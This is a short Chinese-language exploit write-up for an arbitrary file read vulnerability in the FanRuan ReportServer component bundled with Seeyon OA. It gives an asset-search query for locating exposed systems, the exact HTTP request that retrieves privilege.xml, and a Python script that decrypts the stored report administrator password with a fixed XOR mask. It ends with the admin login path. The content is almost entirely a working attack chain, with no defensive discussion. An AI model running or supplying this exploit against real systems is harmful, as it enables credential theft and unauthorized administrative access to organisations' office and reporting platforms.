致远OA 帆软组件 ReportServer存在任意文件读取漏洞
一、漏洞简介
致远OA 帆软组件 ReportServer存在任意文件读取漏洞,攻击者可通过该漏洞获取帆软报表管理员密码。
二、影响版本
- 致远OA 帆软组件
三、资产测绘
- hunter
web.title="致远A8-V5协同管理软件 V6.1sp1" - 特征
四、漏洞复现
GET /seeyonreport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
使用解密脚本解密
cipher = '___0072002a00670066000a' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
print (Password)
登录入口
/seeyonreport/ReportServer?op=fs_load&cmd=fs_signin&_=1713888864019
